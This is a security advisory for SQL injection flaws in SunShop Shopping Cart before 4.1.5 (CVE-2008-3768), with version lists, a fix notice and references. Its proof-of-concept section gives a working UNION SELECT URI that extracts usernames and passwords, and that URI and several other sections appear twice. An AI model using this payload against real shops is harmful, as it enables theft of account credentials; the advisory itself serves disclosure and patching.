SunShop Shopping Cart 'class.ajax.php' Multiple SQL Injection Vulnerabilities
BID:30751
Info
SunShop Shopping Cart 'class.ajax.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 30751 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3768 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 19 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | James Bercegay of the GulfTech Security Research Team |
| Vulnerable: |
TurnkeyWebTools SunShop Shopping Cart 4.1.4 TurnkeyWebTools SunShop Shopping Cart 4.1 TurnkeyWebTools SunShop Shopping Cart 4.0 TurnkeyWebTools SunShop Shopping Cart 3.5.1 TurnkeyWebTools SunShop Shopping Cart 3.5 TurnkeyWebTools SunShop Shopping Cart 3.4 RC1 TurnkeyWebTools SunShop Shopping Cart 2.6 TurnkeyWebTools SunShop Shopping Cart 2.5 TurnkeyWebTools SunShop Shopping Cart 2.4 TurnkeyWebTools SunShop Shopping Cart 2.2 TurnkeyWebTools SunShop Shopping Cart 2.1 TurnkeyWebTools SunShop Shopping Cart 2.0 TurnkeyWebTools SunShop Shopping Cart 1.5 TurnkeyWebTools SunShop Shopping Cart 4.0.0 RC6 |
| Not Vulnerable: |
TurnkeyWebTools SunShop Shopping Cart 4.1.5 |
Discussion
SunShop Shopping Cart 'class.ajax.php' Multiple SQL Injection Vulnerabilities
SunShop Shopping Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to SunShop Shopping Cart 4.1.5 are vulnerable.
SunShop Shopping Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to SunShop Shopping Cart 4.1.5 are vulnerable.
Exploit / POC
SunShop Shopping Cart 'class.ajax.php' Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URI is available:
http://www.example.com/[path]//index.php?l=edit_registry&p=1&id=-99' UNION SELECT 1,2,3,concat(username,char(58),password),5,6 FROM ss_users/*
Attackers can use a browser to exploit these issues.
The following example URI is available:
http://www.example.com/[path]//index.php?l=edit_registry&p=1&id=-99' UNION SELECT 1,2,3,concat(username,char(58),password),5,6 FROM ss_users/*
Solution / Fix
SunShop Shopping Cart 'class.ajax.php' Multiple SQL Injection Vulnerabilities
Solution:
SunShop Shopping Cart 4.1.5 is available to address these issues. Please see the references for more information.
Solution:
SunShop Shopping Cart 4.1.5 is available to address these issues. Please see the references for more information.
References
SunShop Shopping Cart 'class.ajax.php' Multiple SQL Injection Vulnerabilities
References:
References:
- SunShop Shopping Cart Homepage (TurnkeyWebTools)
- v4.1.5 Changelog (TurnkeyWebTools)
- SunShop <= 4.1.4 SQL Injection (GulfTech Security Research
)